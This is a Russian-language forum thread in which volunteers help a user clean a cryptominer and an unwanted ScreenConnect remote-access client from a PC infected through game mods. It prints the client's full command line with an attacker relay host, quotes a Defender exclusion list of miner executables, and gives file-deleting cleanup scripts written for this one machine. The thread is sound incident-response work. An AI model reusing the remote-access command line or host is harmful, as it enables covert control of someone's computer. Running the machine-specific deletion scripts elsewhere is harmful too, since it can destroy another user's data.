Перейти к содержанию

[РЕШЕНО] майнеры нагружают видеокарту на 100% и добавляются сами в исключения антивируса


Рекомендуемые сообщения

Опубликовано

Здравствуйте! Вчера скачала моды для игры. При их установке антивирус начал присылать многочисленные уведомления о подозрительном файле. ФПС в игре тут же просел с 90 до 15. Предполагаю,что это майнер. Моды вроде удалила полностью, антивирус до сих пор что-то отправляет в карантин. Также постоянно пишет о том, что некоторые файлы не были проверены из-за нахождения в списке исключений. (Все исключения во вложении). При удалении файлов из исключений, через некоторое время они опять там оказываются. Видеокарта нагружается до 100%. Также антивирус пишет о том, что якобы "троян" пытается взаимодействовать с powershell.exe

Screenshot_6.png

Screenshot_1.png

Screenshot_2.png

Screenshot_3.png

Screenshot_4.png

Screenshot_5.png

Screenshot_7.png

Опубликовано

Антивирус какой установлен? Можете добавить отчет по обнаружению,  в текстовом формате?

+

Добавьте необходимые отчеты согласно правилам.

 

Опубликовано

проверку выполнила через Kaspersky Virus Removal Tool. Ранее проверяла через Dr.Web CureIt!. Также возникает проблема с проверками через обе программы и при сборе логов в autologger. зависают проверки, помогает только перезагрузка пк.

 

CollectionLog-2026.04.25-13.18.zip

Опубликовано
6 минут назад, kssdmmit сказал:

проверку выполнила через Kaspersky Virus Removal Tool. Ранее проверяла через Dr.Web CureIt!

Отчеты о проверках данных программ можете добавить? в архиве, без пароля.

+

Добавьте дополнительно образ автозапуска с отслеживанием процессов и задач.

 

Если антивирус будет блокировать запуск, или получение файла образа - временно отключите защиту антивируса.

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) или отсюда(2) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.

2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

3.1 Если запросили обычный образ автозапуска, переходим сразу к п.4
Если запросили образ автозапуска с отслеживанием процессов и задач:
В главном меню выбираем "Дополнительно" - Твики" - нажимаем "твик 39" и перегружаем систему. После перезагрузки переходим к п.2 и выполняем все действия из 2, 3, 4, 5, 6.


4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

 

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)

Опубликовано (изменено)

Cureit/Drweb реагирует на этот файл:

C:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS\SCREENCONNECT.CLIENTSERVICE.EXE

 

C:\Program Files (x86)\Platform Runtime Components\ScreenConnect.ClientService.exe - is riskware program Program.RemoteAdmin.975
C:\Program Files (x86)\Platform Runtime Components\ScreenConnect.ClientService.exe - infected - 14ms, 95512 bytes

 

При проверке на VT есть реакция по этому файлу:


 

Цитата

 

Полное имя                  C:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS\SCREENCONNECT.CLIENTSERVICE.EXE
Имя файла                   SCREENCONNECT.CLIENTSERVICE.EXE
Тек. статус                 АКТИВНЫЙ ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ [СЕТЕВАЯ_АКТИВНОСТЬ]
                            
DrWeb                       Program.RemoteAdmin.975
Zillya                      Tool.ConnectWise.Win32.198
Jiangmin                    Trojan.PSW.Stealer.dwe
VBA32                       TrojanPSW.Stealer
DeepInstinct                MALICIOUS
Rising                      Hacktool.ConnectWiseControl!8.17790 (CLOUD)
TrellixENS                  Artemis!752D5CDDA2A1
huorong                     HackTool/ConnectWiseControl.i

www.virustotal.com          2026-04-21 12:49 [2025-04-11]
                            
Сохраненная информация      на момент создания образа
Статус                      АКТИВНЫЙ ПОДОЗРИТЕЛЬНЫЙ [СЕТЕВАЯ_АКТИВНОСТЬ]
Процесс                     32-х битный
File_Id                     6377E6AD18000
Linker                      14.33
Размер                      95512 байт
Создан                      08.04.2025 в 18:35:34
Изменен                     08.04.2025 в 18:35:34
                            
TimeStamp                   18.11.2022 в 20:10:21
EntryPoint                  +
OS Version                  5.1
Subsystem                   Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Сертификат аннулирован
Цифровая подпись            "Connectwise, LLC"
                            
Оригинальное имя            
Версия файла                25.2.4.9229
Версия продукта             25.2.4.9229
Описание                    
Продукт                     
Производитель               
Copyright                   
Внутреннее имя              
                            
Статус                      ПОДОЗРИТЕЛЬНЫЙ ОБЪЕКТ
Цифровая подпись            Сертификат аннулирован
                            
Доп. информация             на момент обновления списка
pid = 4464                  NT AUTHORITY\СИСТЕМА
  CmdLine                   "C:\Program Files (x86)\Platform Runtime Components\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lab-32.total-scan.top&p=28&s=8fc77648-8969-45d4-bbab-f6510c147341&k=BgIAAACkAABSU0ExAAgAAAEAAQBB1GgLeCFPyN7kR5XFBpzBXCoDk9lH9O4DIDPIXDgmKbqSwLGn3FdqhrQeIMb0CTPO6a%2fWsSrxA5xQsPwVbR44QMdp71D%2f16J9ENYAKYZC5w66CraZDXp6aYxKNbE3R%2bWBq21igf8lztKKhcpYjyVeHE8zIMSNEgZLp%2bcuI8DlOGpj0dKITnPwroTvKfaire5bmsOuwVmzfhb46nqACYE6J5oQFObXKLg5s1NWmTHBydODX%2br%2b6BYUS3VcYqfFGRDHRQ%2fjp1r4ag9EtX4CIN1ws4zZcGciMt8MN1Ybvs%2bPGME%2bb7C8WgM5Za6tEXwdRGUGQCukoIjIW2ckhG2GU4TF&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAnZt%2fGEwwokCdnxpReZWyawAAAAACAAAAAAAQZgAAAAEAACAAAAB0djyq0dLnLyrlBIGbXoNzyxHT2i7gb8rXmAPYGEyFDQAAAAAOgAAAAAIAACAAAACotL47zd3V8ILzChXisy6X7mA1L%2bf2O3lLqJa3uK0WhKAEAAB2zDNJwkoklhq3bOZRQBjkjHBYCHxXWzrwWO0CJksO5qqmyiT6F7dihCPrLhnpkta1HU%2bXGt2UVJxjt0fV7lvY9A4D5HtqS4bI3Mt6eMGv7NkOk0rM0QXiPYnyeRiTxyj5XS42N%2bM9yXtVCp2n8Nll55eOUe87Z37gIbFqmzukPo8eNPC8wHwC9LeoIbaO2X5SmQbmTW6tRfe%2fjHjT4K8Cx0a8fHCguU7Ly0iqJc79Ce4zcnNrfBp%2feC1kGpzlKDvVGBI%2f50Nndagp%2bje8HQ%2fMl7kabXDunQ86X%2bq5fh%2fxmOQAj8r72aLmqGvs3TujNaJqkKCKwFrApRRYAjVxKou%2bJ4J6FiBwkRnqumodGBiaKoj50%2fJIyWqtBWbbTCMLJD9EujeN%2bHoaeK7bHbZRCa7XFRQMF3LokhVv5lSc4BD6DnsHeKzds7q9Go1vwIcQG1WSl0S5ej8ZkucdzBromM07xetUiZI0oIMqjZX3gFtxeQsrlhaw2f5Y0Wm9kaKqWO7v5LDthIhEUomVigUulMjhbPlvwmF%2bY9NcwsN5upruWvYArjV7rY5Ise9Xm%2fanXxt28Z0xLxAzi2Gt8EryTt8sP7Kr6CKFjVMOZ0s%2bdAmO6EgbH0%2bd6xW%2bAgYGju451M7zbtJCWdvt%2biRB54XfmYK7%2bcy70mkFqze9%2fV7fLMD129Qf6iQiK3EZJQnmBLLxJS1b27nThqcyjdM%2b9y8kmLBjE51A%2bCToBprlYLLEjSU2kK00dODtGXDJC6VKxKjUYMKuVILF6iPwjqlL%2fUpXxcQD2PgCLdHywS4ceE6Ux7yutUq9rolFT3tkrDdGetCfE1%2bj%2fesJejmhgqRVq2Njzrh8OvxiVErrGUXTBGoNrenjk1DRtQlgWR3X7WJpulDydOC8x2pxCaJZjM8S6au1Lnsvdswwnjy0%2fJ4aNmMlJzQEZINR2AUvwhZ1BB%2fQucWlW1qrRX9Af39H9Bsi3SoBh7B28kpjjaaImOQ4%2fs2PmQM%2fHUbpxeZG1UCUflDoqgddjTz%2fJuThB1lXd7paGCEUQuiJiHIYaKu7dhQ42X3tgN4Y6vJiOng73slOegRdcAli2g0DVYHVnKkI7wUS0jZLvU5nWt%2bcVtcXM3LyM%2fiHCE3N6CRK4T1VNokkZKuK%2bScEnQ%2fr56qgXqpbl%2bYRDDgK7%2f3G4tglLBd%2foL%2fMP641bpHHd%2f4epi1AMl
  Процесс создан            14:16:51 [2026.04.25]
  С момента создания        00:01:19
  CPU                       0,07%
  CPU (1 core)              0,83%
  parentid = 1144           C:\WINDOWS\SYSTEM32\SERVICES.EXE
  ESTABLISHED               192.168.1.100:61500 <-> 198.23.185.238:28
SHA1                        D4FD4FF0709271323B8D401579270E6567B6E360
MD5                         752D5CDDA2A1D93D27E38F98A5D23FC2
                            
Образы                      EXE и DLL
SCREENCONNECT.CLIENTSERVICE.EXEC:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS
                            
Загруженные DLL             НЕИЗВЕСТНЫЕ
SCREENCONNECT.CLIENT.DLL    C:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS
SCREENCONNECT.CLIENTSERVICE.DLLC:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS
SCREENCONNECT.CORE.DLL      C:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS
SCREENCONNECT.WINDOWS.DLL   C:\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS
                            
 

 

 

 

 

Изменено пользователем safety
Опубликовано (изменено)

Эту программу сами ставили?

ScreenConnect Client (6093725f08615ea6)

 

ScreenConnect.ClientService.exe — это легитимный исполняемый файл программы удаленного доступа ConnectWise ScreenConnect (ранее Elsinore ScreenConnect), используемый для удаленной поддержки, управления ПК и работы IT-специалистов. Файл обычно находится в папках Program Files и обеспечивает фоновую работу клиента. Однако, его могут использовать злоумышленники для несанкционированного доступа (RAT), маскируя под системный процесс

------------

т.е. видим что есть подключение на удаленный адрес:

192.168.1.100:61500 <-> 198.23.185.238:28   &&&& Country: US

и

через ScreenConnect выполняется удаленный закодированный запрос:

CmdLine                   "C:\Program Files (x86)\Platform Runtime Components\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=lab-32.total-scan.top&p=28&s=8fc77648-8969-45d4-bbab-f6510c147341&k=BgIAAACkAABSU0ExAAgAAAEAAQBB1GgLeCFPyN7kR5XFBpzBXCoDk9lH9O4DIDPIXDgmKbqSwLGn3FdqhrQeIMb0CTPO6a%2fWsSrxA5......*****

 

------------

Если вы не используете данную программу, вы можете ее деинсталлировать через установку/удаление программ.

Изменено пользователем safety
Опубликовано

Судя по списку исключений была попытка установить майнер.

 

; Defender: Исключения

ПОДОЗРИТ.  | ADDINPROCESS.EXE
ПОДОЗРИТ.  | APPLAUNCH.EXE
ПОДОЗРИТ.  | ASPNET_COMPILER.EXE
ПОДОЗРИТ.  | GMINER.EXE
ПОДОЗРИТ.  | INSTALLUTIL.EXE
ПОДОЗРИТ.  | LOLMINER.EXE
ПОДОЗРИТ.  | MINER.EXE
ПОДОЗРИТ.  | MSBUILD.EXE
ПОДОЗРИТ.  | REGASM.EXE
ПОДОЗРИТ.  | REGSVCS.EXE
ПОДОЗРИТ.  | RUNTIMEHOST.EXE
ПОДОЗРИТ.  | SRBMINER-MULTI.EXE

 

Сейчас лучше деинсталлировать  ScreenConnect Client (6093725f08615ea6), и собрать новый образ автозапуска. (Еще раз твик 39 не надо включать - отслеживание процессов уже работает)

 

Далее, зачистим через uVS все что останется, в том числе и исключения в дефендере, и продолжим дальнейшую очистку системы другими контрольными утилитами.

Опубликовано (изменено)

По очистке системы:

 

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу uVS без перезагрузкой системы

;uVS v5.0.5v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
delref ADDINPROCESS.EXE
delref APPLAUNCH.EXE
delref ASPNET_COMPILER.EXE
delref WDE:\C:
delref GMINER.EXE
delref INSTALLUTIL.EXE
delref LOLMINER.EXE
delref MINER.EXE
delref %Sys32%\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\ISLCID\MONTH.EXE
delref MSBUILD.EXE
delref %SystemDrive%\USERS\PUBLIC
delref REGASM.EXE
delref REGSVCS.EXE
delref RUNTIMEHOST.EXE
delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\CACHES\D3F4E2A1\RUNTIMEHOST.EXE
delref SRBMINER-MULTI.EXE
delref %SystemRoot%\TEMP
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V4.0.30319
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319
delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\CACHES\D3F4E2A1\CONTENT.IE5
deldirex %SystemDrive%\PROGRAM FILES (X86)\PLATFORM RUNTIME COMPONENTS
;------------------------autoscript---------------------------

apply

deltmp
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\FRAMEVIEWSDK\FRAMEVIEW.CSV
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVCONTAINER\NVCONTAINERTELEMETRYAPI.DLL
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\OFFICE16\OLICENSEHEARTBEAT.EXE
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {F576B2F9-7850-4226-ADB0-E5993FED4F02}\[CLSID]
delref {AF28889E-B0FD-494C-9FB0-D3B058A96B34}\[CLSID]
delref {F47D8C53-0B74-4A66-959D-367710AB1F84}\[CLSID]
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\WINDOWS PLATFORM RUNTIME.EXE
delref %Sys32%\DRIVERS\HOSTPACKET.SYS
delref %SystemDrive%\KVRT2020_DATA\TEMP\C60AF545689140735B52530F7AFBA1CE\KLUPD_9E175C7CA_ARKMON.SYS
delref %Sys32%\ZAPRET.EXE
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\138.0.7204.101\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН CHROME
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\138.0.7204.101\RESOURCES\NETWORK_SPEECH_SYNTHESIS/MV3\GOOGLE NETWORK SPEECH
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\138.0.7204.101\RESOURCES\PDF\CHROME PDF VIEWER
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\143.0.7499.170\RESOURCES\HANGOUT_SERVICES\GOOGLE HANGOUTS
delref %SystemDrive%\USERS\-KS-\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\25.2.3.809\RESOURCES\WEB_STORE\МАГАЗИН ПРИЛОЖЕНИЙ
delref %SystemDrive%\USERS\-KS-\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\25.2.3.809\RESOURCES\YANDEX\BOOK_READER\BOOKREADER
delref %SystemDrive%\USERS\-KS-\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\25.2.3.809\RESOURCES\OPERA_STORE\OPERA STORE
delref %SystemDrive%\USERS\-KS-\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\APPLICATION\25.2.3.809\RESOURCES\PDF\CHROMIUM PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\EDGE_CLIPBOARD\MICROSOFT CLIPBOARD EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.72\RESOURCES\EDGE_SUPPRESS_CONSENT_PROMPT\SUPPRESS CONSENT PROMPT
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\MEDIA_INTERNALS_SERVICES\MEDIA INTERNALS SERVICES EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\MICROSOFT_WEB_STORE\MICROSOFT STORE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\EDGE_FEEDBACK\EDGE FEEDBACK
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\MICROSOFT_VOICES\MICROSOFT VOICES
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\122.0.2365.106\RESOURCES\EDGE_PDF\MICROSOFT EDGE PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\144.0.3719.82\RESOURCES\WEBRTC_INTERNALS\WEBRTC INTERNALS EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\144.0.3719.82\RESOURCES\HANGOUT_SERVICES\WEBRTC EXTENSION
delref D:\APPS\STEAM.EXE
delref D:\AMAZING LAUNCHER\AMAZINGUPDATER.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\LAGOFAST\UNINSTALL.EXE
;-------------------------------------------------------------
REGT 40
restart

Далее:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

добавьте логи FRST для контроля

Изменено пользователем safety
Опубликовано (изменено)

Проверьте в реестре (через regedit) что это за ключи

(!) Check too long value (5160 bytes): HKLM\SYSTEM\ControlSet001\Services\Windows Platform Runtime\ImagePath
(!) Check too long value (5160 bytes): HKLM\SYSTEM\ControlSet001\Services\Windows Platform Runtime\ImagePath
(!) Check too long value (11720 bytes): HKLM\SYSTEM\ControlSet001\Services\zapret\ImagePath

 

по очистке системы в FRST:

 

Выполнить очистку в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы

Start::
FirewallRules: [{5DC0E589-6901-4C3E-920A-71899BCA2931}] => (Allow) D:\Apps\Steam.exe => Нет файла
FirewallRules: [{588AC607-8363-4425-8FB6-04819949C34A}] => (Allow) D:\Apps\Steam.exe => Нет файла
FirewallRules: [{3F633F24-2F43-4804-A678-E126088BBAFC}] => (Allow) D:\Apps\bin\cef\cef.win7x64\steamwebhelper.exe => Нет файла
FirewallRules: [{12F84D42-6F9A-4FF6-84C7-E4AAD17D7059}] => (Allow) D:\Apps\bin\cef\cef.win7x64\steamwebhelper.exe => Нет файла
FirewallRules: [{B30DE820-793F-4031-8B29-7D2092BC8752}] => (Allow) D:\Apps\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => Нет файла
FirewallRules: [{CC166F88-1158-496E-AB6C-CB7A524C3F92}] => (Allow) D:\Apps\Steam\bin\cef\cef.win7x64\steamwebhelper.exe => Нет файла
FirewallRules: [TCP Query User{A5797DBA-8999-4562-B703-3A05D64729F0}D:\apps\tanki\win64\tanki.exe] => (Allow) D:\apps\tanki\win64\tanki.exe => Нет файла
FirewallRules: [UDP Query User{70A72703-F882-4EED-8399-838D2BEECA9E}D:\apps\tanki\win64\tanki.exe] => (Allow) D:\apps\tanki\win64\tanki.exe => Нет файла
FirewallRules: [TCP Query User{00251CEC-4318-4613-8364-A11DEF98C9D0}D:\the last of us1\tlou-i.exe] => (Allow) D:\the last of us1\tlou-i.exe => Нет файла
FirewallRules: [UDP Query User{733948AC-5D9C-4DB6-AFBA-E85E384D30D6}D:\the last of us1\tlou-i.exe] => (Allow) D:\the last of us1\tlou-i.exe => Нет файла
FirewallRules: [{0D446D2B-5622-4F0C-A1F5-BDBA1C824900}] => (Allow) D:\Red Dead Redemption 2\RDR2.exe => Нет файла
FirewallRules: [{E85E521F-BF75-4669-B490-FAD61D9A032F}] => (Allow) D:\Red Dead Redemption 2\RDR2.exe => Нет файла
FirewallRules: [TCP Query User{BEB14A7F-CB13-488D-AD96-7FCBF892E4A0}D:\dying light 2\ph\work\bin\x64\dyinglightgame_x64_rwdi.exe] => (Allow) D:\dying FirewallRules: [UDP Query User{A70517ED-419B-4244-A7A3-E93B21BBBD38}D:\dying light 2\ph\work\bin\x64\dyinglightgame_x64_rwdi.exe] => (Allow) D:\dying
FirewallRules: [{e9da2e23-6b2f-4353-aa09-5c767d10020c}] => (Allow) C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe => Нет файла
FirewallRules: [{c623457c-4779-43f6-939f-7dd42eb5d0e8}] => (Allow) C:\Program Files\ldplayer9box\VBoxNetNAT.exe => Нет файла
FirewallRules: [{d3fbd111-cd6e-407c-a723-5cb9fc9f6c89}] => (Allow) C:\LDPlayer\LDPlayer9\dnplayer.exe => Нет файла
FirewallRules: [{64F18BD5-C572-4EB1-ABF1-AA74001B8195}] => (Allow) C:\Program Files (x86)\LagoFast\LagoFast.exe => Нет файла
FirewallRules: [{3D82F2C0-08F4-4202-B5AC-91F9B33B71E3}] => (Allow) C:\Program Files (x86)\LagoFast\LagoFast.exe => Нет файла
FirewallRules: [{B475B062-EBB4-4B18-9966-877D85569DBB}] => (Allow) C:\Program Files (x86)\LagoFast\lagoFastProxy.exe => Нет файла
FirewallRules: [{622177F9-330E-4E1D-9605-D381C23C65D0}] => (Allow) C:\Program Files (x86)\LagoFast\lagoFastProxy.exe => Нет файла
FirewallRules: [{138C4D97-B38A-47BF-BA3F-1DE9BBBE36D0}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
FirewallRules: [{D485DA5F-9D47-4533-A805-3BCD7AF04EEA}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
FirewallRules: [{E49D7E00-CB17-4030-9E7C-B7A2D27B32D0}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
FirewallRules: [{1AFA3801-67F0-48D1-9F6A-FC357A51AD77}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
FirewallRules: [{44CBA8DE-877A-4602-9C20-5A646822E6D6}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{4CF303C7-9B96-4AAD-B604-AB58F946E95B}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{0919B080-E2C7-4A53-BBE7-688DD37ED946}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{C75B77A2-E8C8-4F56-8B12-EB1DF74441A0}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{9DD8CFFD-A504-4974-B1BA-DEF398378648}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{1813E532-082F-4432-8F6C-710F1FE06F69}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8A7807-2FBF-4C2C-BA75-53D623933512}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6AB5FC9F-6E61-4588-BE7A-8CA080993DE0}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{AE24AFF5-A783-402E-ADA6-AA4B262FA76F}] => (Allow) C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1\RuntimeHost.exe => Нет файла
FirewallRules: [{86DE0B74-D3BB-4A4E-B367-77847D330F20}] => (Allow) C:\ProgramData\Microsoft\Windows\Caches\D3F4E2A1\RuntimeHost.exe => Нет файла
FirewallRules: [{690B12A8-2AAC-4068-8832-B3AEDB683894}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{B0BE2FEA-7FC8-4B4F-80F8-E0E103AF7E1B}] => (Allow) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe (Microsoft Corporation -> Microsoft Corporation)
GroupPolicy: Ограничение ? <==== ВНИМАНИЕ
Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ
Reboot::
End::


После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

+

сделайте новый образ автозапуска в uVS для контроля очистки системы.

Изменено пользователем safety
Опубликовано

ключ (!) Check too long value (11720 bytes): HKLM\SYSTEM\ControlSet001\Services\zapret\ImagePath связан с программой, которой я пользуюсь.
два остальных 
(!) Check too long value (5160 bytes): HKLM\SYSTEM\ControlSet001\Services\Windows Platform Runtime\ImagePath

(!) Check too long value (5160 bytes): HKLM\SYSTEM\ControlSet001\Services\Windows Platform Runtime\ImagePath
не могу найти в реестре в папке Services.

DESKTOP-V9KN1EJ_2026-04-26_15-36-05_v5.0.5v x64.7z Fixlog.txt

Опубликовано
26 минут назад, kssdmmit сказал:

не могу найти в реестре в папке Services.

Возможно были зачищены первым скриптом в uVs

Судя по новому образу и Fixlog, все что планировалось зачистить в uVS и FRST -зачистилось успешно.

 

Если очистка системы была успешной и вопросов и проблем в работе системы не осталось:

 

завершающие шаги:

 

    Загрузите SecurityCheck by glax24 & Severnyj, https://safezone.cc/resources/security-check-by-glax24.25/ сохраните утилиту на Рабочем столе и извлеките из архива.
    Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
    Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
    Прикрепите этот файл к своему следующему сообщению.

.

Опубликовано

исключения пока что не добавляет в антивирус, видеокарту не нагружает. Огромное спасибо за помощь!

SecurityCheck.txt

Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • SuPeR_1
      Автор SuPeR_1
      Когда играл заметил что ФПС низкий почему то, решил быстро клавишами Ctrl+Shift+Esc диспетчер задач и ЦП со 100% резко падал до дна, и не надо как в прошлый раз писать что диспетчер задач не означает что есть вирус-майнер-троян, у меня ведь и ФПС низкий, раньше в Minecraft были 100-200 ФПС, сейчас 60 и даже меньше. Провёл сканером Dr web и логи собрал. Пол года назад тоже тут обращался, помогли, надеюсь и в этот раз помогут и буду теперь все файлы проверять онлайн-сканером
      CollectionLog-2025.02.23-15.08.zip
    • Charlie
      Автор Charlie
      Почистил майнер на System Explorer, а он просто каждый раз превращается в новый файл. Что делать
    • conrad
      Автор conrad
      Здравствуйте! Пару недель назад словил майнер. Пытался удалить сам, большинство проблем устранил, однако остались подозрения и паранойя, что еще "остатки" от этой проблемы где-то лежат в системе (не устанавливаются обычные антивирусы по типу dr web space и бесплатная версия касперского). Поэтому прошу о помощи. И еще вопрос, могут ли подобные вирусы заражать usb-носители?
      Ниже прикреплены логи, как по методичке. 
      CollectionLog-2024.01.20-14.04.zip
    • FokinZ
      Автор FokinZ
      Добрый день,помогите решить проблему,столкнулся с  Trojan.Auto lt.1224 и Tool.BtcMine.2733,прогнал через CureIT!,Hitman и другие,ничего не помогло,вкладки сразу закрывает,настройки компьютера закрывает и браузер тоже.Уже не знаю что и делать,буду признателен за внимание!

    • Aling4r
      Автор Aling4r
      Здравствуйте, подскажите пожалуйста, как удалить HEUR:Trojan.Win64.Miner.gen, KTS при попытке лечения с перезагрузкой, после самой перезагрузки снова показывает что обнаружен этот вирус, при ручном удалении файлов, та же ошибка. Что делать? 
